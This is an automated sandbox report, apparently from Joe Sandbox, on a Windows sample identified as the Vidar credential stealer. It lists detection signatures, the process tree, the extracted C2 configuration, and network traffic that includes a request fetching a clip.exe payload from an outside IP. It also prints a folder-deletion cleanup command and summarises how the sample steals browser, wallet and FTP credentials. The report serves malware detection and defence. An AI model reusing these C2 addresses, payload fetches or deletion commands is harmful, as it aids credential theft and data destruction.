Windows Analysis Report
7AeSqNv1rC.exe

Overview

General Information

Sample name: 7AeSqNv1rC.exe
(renamed because original name is a hash value)
Original sample name: f275736a38a6b90825076e8d786ad5c5.exe
Analysis ID: 1528620
MD5: f275736a38a6b90825076e8d786ad5c5
SHA1: c0d862ceab728736580f043316cdc099b2ab8924
SHA256: b48eeab60494eb44d8d5ef10a87fd46ad1aa33fdcf7245efb636f69f2fd55f42
Tags: 32, exe, trojan, Vidar
Infos:

Detection

MicroClip, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MicroClip
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 7AeSqNv1rC.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\7AeSqNv1rC.exe" MD5: F275736A38A6B90825076E8D786AD5C5)
    • InstallUtil.exe (PID: 7628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 7648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2472 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7220 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7064 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |
00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
4.2.InstallUtil.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
4.2.InstallUtil.exe.400000.0.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
4.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
4.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T04:59:37.752997+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:38.916623+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:40.295762+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:41.646972+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:42.993948+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:44.408957+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:45.421774+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:48.358591+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:49.452342+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:50.461923+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:51.554296+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:52.582976+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:54.335990+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:55.978719+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:57.531571+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 49.12.106.214 | 443 | TCP
2024-10-08T04:59:59.016134+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49764 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:00.287265+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49775 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:03.370299+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49793 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:04.549674+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49802 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:05.905361+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49812 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:07.445567+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49822 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:09.361394+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49835 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:11.344325+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49847 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:14.613134+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49868 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:16.152280+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49882 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:17.634663+0200 | 2054495 | 1 | A Network Trojan was detected | 192.168.2.4 | 49891 | 45.132.206.251 | 80 | TCP
2024-10-08T04:59:42.331574+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.12.106.214 | 443 | 192.168.2.4 | 49745 | TCP
2024-10-08T04:59:43.686243+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.12.106.214 | 443 | 192.168.2.4 | 49746 | TCP
2024-10-08T04:59:43.686214+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 49.12.106.214 | 443 | TCP
2024-10-08T05:00:14.868528+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49874 | 185.215.113.117 | 80 | TCP

                        AV Detection

Source: https://t.me/ae5ed, URL Reputation: Label: malware
Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}
Source: cowod.hopto.org, Virustotal: Detection: 10%
Source: https://49.12.106.214, Virustotal: Detection: 7%
Source: http://cowod.hopto.org, Virustotal: Detection: 10%
Source: https://49.12.106.214/mozglue.dll, Virustotal: Detection: 6%
Source: https://49.12.106.214/, Virustotal: Detection: 7%
Source: https://49.12.106.214/nss3.dll, Virustotal: Detection: 6%
Source: https://49.12.106.214/softokn3.dll, Virustotal: Detection: 6%
Source: http://185.215.113.117/inc/clip.exe, Virustotal: Detection: 19%
Source: https://49.12.106.214/freebl3.dll, Virustotal: Detection: 6%
Source: http://185.215.113.117/, Virustotal: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe, ReversingLabs: Detection: 87%
Source: 7AeSqNv1rC.exe, ReversingLabs: Detection: 65%
Source: 7AeSqNv1rC.exe, Virustotal: Detection: 30%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe, Joe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,4_2_004080A1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00408048
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00411E5D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_0040A7D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C646C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C646C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C79A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C794440 PK11_PrivDecrypt,4_2_6C794440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C764420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_6C764420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7944C0 PK11_PubEncrypt,4_2_6C7944C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_6C7E25B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C778670 PK11_ExportEncryptedPrivKeyInfo,4_2_6C778670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_6C79A650
Source: unknown, HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: 7AeSqNv1rC.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2479689311.000000003A9CF000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2474489221.000000002EAE4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]4_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax4_2_004014AD

                        Networking

Source: Network traffic, Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49891 -> 45.132.206.251:80
Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49746 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.106.214:443 -> 192.168.2.4:49746
Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.106.214:443 -> 192.168.2.4:49745
Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Tue, 08 Oct 2024 03:00:12 GMT; Content-Type: application/octet-stream; Content-Length: 519680; Last-Modified: Fri, 13 Sep 2024 18:20:04 GMT; Connection: keep-alive; ETag: "66e48254-7ee00"; Accept-Ranges: bytes
Source: global traffic, HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1; Host: steamcommunity.com; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /inc/clip.exe HTTP/1.1; Host: 185.215.113.117; Connection: Keep-Alive; Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 104.102.49.254
Source: Joe Sandbox View, IP Address: 185.215.113.117
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, ASN Name: LIFELINK-ASRU
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 49.12.106.214:443
